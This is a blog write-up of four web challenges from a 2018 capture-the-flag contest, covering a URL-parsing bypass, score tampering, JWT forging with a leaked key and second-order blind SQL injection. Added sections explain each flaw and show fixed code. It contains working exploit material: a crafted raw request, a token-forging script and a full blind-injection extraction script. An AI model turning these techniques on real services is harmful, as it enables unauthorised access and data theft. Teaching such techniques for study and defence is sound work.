N0rth3ty's Blog.

网鼎杯第三场WP

Word count: 725 Reading time: 3 min
2018/09/12

Sometimes you can solve a challenge, but fundamentals decide a great deal.
That is probably the biggest thing this competition left me with.

web

Web1

A `.` inside the URI is rejected, so a request that begins with `.` has to be constructed. Using an Apache2 trick, build `..@c7f.zhuque.com/..//?a=1`: the request first enters a non-existent location `..@c7f.zhuque.com` and then climbs back out through `../`. At this point the result of parse_url is

```
Array
(
    [scheme] => ..
    [host] => c7f.zhuque.com
    [path] => /../..//
)
```

After the challenge resolves it, the URL becomes http://127.0.1..@c7f.zhuque.com/..//?a=1, and now the result of parse_url is

```
Array
(
    [scheme] => http
    [host] => c7f.zhuque.com
    [user] => 127.0.0.1..
    [path] => /../..//
    [query] => ?a=1
)
```

This passes the check, so send the request from Burp:

```http
GET ..@c7f.zhuque.com/..//?a=1 HTTP/1.1
Host: 117.50.11.83
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```

The flag comes back in the response headers: flag{f3efb5dc-2b79-47ab-89dd-c9a36915e729}
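The root cause in Web1 is a check that looks only at the parsed host while the URL carries userinfo before the `@` and dot-segments in the path. The following is an added example (not the challenge's PHP and not the author's code) showing, with Python's `urllib.parse.urlsplit`, how the same URL splits into userinfo `127.0.0.1..` and host `c7f.zhuque.com`, and how a stricter validator rejects it. The allowlist `ALLOWED_HOSTS` and the function names are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Constructed allowlist for this example; the real challenge's rule is not on the page.
ALLOWED_HOSTS = {"c7f.zhuque.com"}


def naive_host_check(url):
    """Trusts only the parsed host: the pattern the '127.0.0.1..@' URL slips past."""
    return urlsplit(url).hostname in ALLOWED_HOSTS


def strict_url_check(url):
    """Accepts only plain http(s) URLs to an allowed host, with no userinfo and no dot-segments."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    # Everything before '@' is userinfo. It is not the host, but a check that only
    # scans the string for an address may mistake it for one.
    if parts.username is not None or parts.password is not None:
        return False
    if parts.hostname not in ALLOWED_HOSTS:
        return False
    # Refuse traversal segments and empty segments ('/..//') rather than normalising them.
    segments = parts.path.split("/")
    if ".." in segments or "//" in parts.path:
        return False
    return True


def split_for_display(url):
    """Return (username, hostname, path, query) so the userinfo/host split is visible."""
    p = urlsplit(url)
    return p.username, p.hostname, p.path, p.query


if __name__ == "__main__":
    url = "http://127.0.0.1..@c7f.zhuque.com/..//?a=1"
    print(split_for_display(url))
    print("naive check passes:", naive_host_check(url))
    print("strict check passes:", strict_url_check(url))
```

The naive check returns True for the writeup's URL because `hostname` really is `c7f.zhuque.com`; the strict check returns False on the userinfo alone, and would also fail on the `..` segment. The scheme-less form `..@c7f.zhuque.com/..//?a=1` has no host at all after splitting, which is why the challenge had to prepend `http://127.0.0.1` before the parse described above.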

Web2

Open index; its JS contains this key piece of code:

```javascript
$.ajax({
    type: 'POST',
    url: './index.php',
    data: {
        getGod: fs                       // fs: the value posted as the score
    },
    success: function(data) {
        if (data == '0') ;               // nothing to do
        else if (data == '1') alert("Error!");
        else alert(data);                // any other response is shown as-is
    },
    error: function() {
        alert("未知错误...");            // "Unknown error..."
        window.open("./index.php", "_0");
    }
});
```

Watching the network requests, the score keeps being updated through this endpoint.
Open Burp, intercept the first request whose score is 0, and use Intruder to increment it by one each time to obtain the flag:
flag{cc090255-5786-4a30-bc1d-e74ad1861b42}

Web3

Log in as test and look at the cookie: it is JWT-based, the algorithm is HS256, and the key is given, so admin's cookie can be produced directly.

```python
import jwt  # PyJWT

# The HS256 key handed out by the challenge
s = "uy8qz-!kru%*2h7$q&veq=y_r1abu-xd_219y%phex!@4hv62+"
encoded = jwt.encode({'username': 'admin'}, s, algorithm='HS256')
print(encoded)
# 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.NYSsNZ1gR8EUYebNTmXPBhdoh-mA5OjHkeWjM4gPxqY'
```

Log in as admin to get the flag.
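What makes Web3 solvable is that an HS256 JWT is only as trustworthy as the secrecy of its HMAC key: whoever holds the key can mint any claims. The block below is an added example, not the challenge's server code and not the author's script, that implements HS256 signing and verification with the standard library so the verification a server must perform is visible. It uses the key from the writeup; `hs256_sign`, `hs256_verify` and the sample claims are names and inputs chosen for the example. The verifier pins the algorithm, so an `alg: none` token or a wrong key is refused, and it uses a constant-time compare.

```python
import base64
import hashlib
import hmac
import json

# Key from the writeup; in a real service this value must never be exposed.
KEY = "uy8qz-!kru%*2h7$q&veq=y_r1abu-xd_219y%phex!@4hv62+"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def hs256_sign(payload: dict, key: str) -> str:
    """Build header.payload.signature with compact, key-sorted JSON (as PyJWT does)."""
    header = {"alg": "HS256", "typ": "JWT"}
    segments = [
        b64url(json.dumps(part, separators=(",", ":"), sort_keys=True).encode())
        for part in (header, payload)
    ]
    signing_input = ".".join(segments).encode()
    sig = hmac.new(key.encode(), signing_input, hashlib.sha256).digest()
    return ".".join(segments + [b64url(sig)])


def hs256_verify(token: str, key: str):
    """Return the payload dict if the token is valid under key, otherwise None."""
    try:
        h64, p64, s64 = token.split(".")
        header = json.loads(b64url_decode(h64))
    except (ValueError, UnicodeDecodeError):
        return None
    # Pin the algorithm: never let the token choose ('none', or a swap to RS256).
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key.encode(), f"{h64}.{p64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s64)):
        return None
    return json.loads(b64url_decode(p64))


def tamper_payload(token: str, new_payload: dict) -> str:
    """Swap the payload but keep the old signature (what an attacker without the key can do)."""
    h64, _, s64 = token.split(".")
    p64 = b64url(json.dumps(new_payload, separators=(",", ":"), sort_keys=True).encode())
    return ".".join([h64, p64, s64])


if __name__ == "__main__":
    token = hs256_sign({"username": "admin"}, KEY)
    print(token)
    print("valid:", hs256_verify(token, KEY))
    print("wrong key:", hs256_verify(token, "not-the-key"))
    print("tampered:", hs256_verify(tamper_payload(token, {"username": "root"}), KEY))
```

The first two segments of a token produced this way match the ones in the writeup's output, because the header and payload encoding is deterministic; the signature is where the key matters. Without the key, `tamper_payload` yields a token the verifier rejects; with the key, any payload verifies, which is exactly the situation the challenge set up.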

Web4

Second-order boolean-based blind injection; the payload script is as follows.

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 script: it relies on the print statement and str.encode("hex").

import time
import random

# https://github.com/LyleMi/Saker
from saker.main import Saker
from saker.fuzzers.sqli import SQLi


class Cli(Saker):

    def __init__(self, url):
        super(Cli, self).__init__(url)

    def login(self, username, password="test"):
        params = {"page": "login"}
        data = {
            "username": username,
            "password": password,
            "login": "Login",
        }
        self.post("login.php", params=params, data=data)
        print(self.lastr.content)

    def register(self, username, phone, password="test"):
        params = {"page": "register"}
        data = {
            "username": username,
            "password": password,
            "register": "Login",
            "phone": phone,
        }
        self.post("register.php", params=params, data=data)
        # print(self.lastr.content)

    def query(self):
        # query.php uses the phone stored at registration: the second-order sink
        self.get("query.php")
        print(self.lastr.content)

    def logout(self):
        self.get("logout.php")
        print(self.lastr.content)


if __name__ == '__main__':
    url = "http://bc5bac220e2441efaa68974b28620fe74f38f99c7d884171.game.ichunqiu.com/"
    c = Cli(url)
    name = "rebirth" + str(random.random())
    # register one account whose phone is "1", the value the injected condition is prefixed with
    phone = "1"
    c.register("lyle", phone)

    mid = 256   # bit mask, halved each round: 128, 64, ..., 1
    pos = 0     # character position in the result
    guess = 0   # bits collected for the current character
    content = ''
    while pos < 60:
        mid /= 2  # integer division in Python 2
        # earlier enumeration steps, each overridden by the next assignment
        payload = SQLi.schemas(1)  # get test database
        payload = SQLi.tables("test")  # get flag
        payload = SQLi.columns("test", "flag")
        payload = "select f14g from test.flag"
        payload = SQLi.sub(payload, pos, mid)
        if mid == 0:
            # all bits of this character collected; move to the next position
            mid = 256
            pos += 1
            content += chr(guess)
            print 'flag', content
            guess = 0
        else:
            guess <<= 1
        name = "rebirth" + str(random.random())
        phone = "1' and %s #" % payload
        # print(phone)
        # exit()
        phone = "0x" + phone.encode("hex")  # hex literal, so the value is stored verbatim
        while True:
            try:
                c.register(name, phone)
                c.query()
                break
            except Exception as e:
                # network error, retry after a pause
                print(e)
                time.sleep(1)

        # "0人" (0 people) in the response means the condition was false
        guess += int("0人" not in c.lastr.content)
```

Finally the flag: flag{d2d777d5-74c5-4728-93f7-2d310a79becc}
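The defining feature of Web4 is that the phone number is stored safely at registration and only becomes dangerous when query.php reuses the stored value in a new query. The block below is an added example, not the challenge's source and not the author's script, that reproduces that second-order pattern against an in-memory SQLite database and places the fixed lookup beside it. The schema, the `count(*)`-style lookup (inferred from the "0人" check above) and the function names are assumptions; SQLite's `--` comment replaces the MySQL `#` used in the writeup's payload.

```python
import sqlite3

# Constructed stand-in for the challenge's database. Only the 'flag' table and 'f14g'
# column come from the writeup's payload; everything else is assumed for the example.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, phone TEXT)")
    conn.execute("CREATE TABLE flag (f14g TEXT)")
    conn.execute("INSERT INTO flag VALUES ('flag{constructed-example}')")
    return conn


def register(conn, username, phone):
    """First use of the input is safe: a parameterised INSERT stores the phone verbatim."""
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, phone))
    conn.commit()


def stored_phone(conn, username):
    return conn.execute("SELECT phone FROM users WHERE username = ?", (username,)).fetchone()[0]


def count_by_phone_vulnerable(conn, username):
    """Second-order bug: the already-stored phone is spliced into a new query as SQL text."""
    phone = stored_phone(conn, username)
    sql = "SELECT count(*) FROM users WHERE phone = '%s'" % phone   # the flaw
    return conn.execute(sql).fetchone()[0]


def count_by_phone_fixed(conn, username):
    """Same lookup with a bound parameter: the stored value is compared, never executed."""
    phone = stored_phone(conn, username)
    return conn.execute("SELECT count(*) FROM users WHERE phone = ?", (phone,)).fetchone()[0]


def oracle_demo():
    """Return ((vuln_true, vuln_false), (fixed_true, fixed_false)) for two stored conditions."""
    conn = make_db()
    register(conn, "lyle", "1")  # a plain account with phone '1', as the writeup registers first
    true_cond = "1' AND (SELECT substr(f14g, 1, 1) FROM flag) = 'f' --"
    false_cond = "1' AND (SELECT substr(f14g, 1, 1) FROM flag) = 'x' --"
    register(conn, "probe_true", true_cond)
    register(conn, "probe_false", false_cond)
    vulnerable = (count_by_phone_vulnerable(conn, "probe_true"),
                  count_by_phone_vulnerable(conn, "probe_false"))
    fixed = (count_by_phone_fixed(conn, "probe_true"),
             count_by_phone_fixed(conn, "probe_false"))
    return vulnerable, fixed


if __name__ == "__main__":
    vuln, fixed = oracle_demo()
    print("vulnerable lookup (true cond, false cond):", vuln)
    print("fixed lookup      (true cond, false cond):", fixed)
```

With the string-built query the count depends on the flag's first character (1 when the condition holds, 0 when it does not), which is the oracle the script above reads through "0人". With the bound parameter both probes return 1: the row matched is the probe's own, and nothing about the flag leaks. The lesson is that escaping at the point of input is not enough; every query that consumes stored data needs parameters too.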
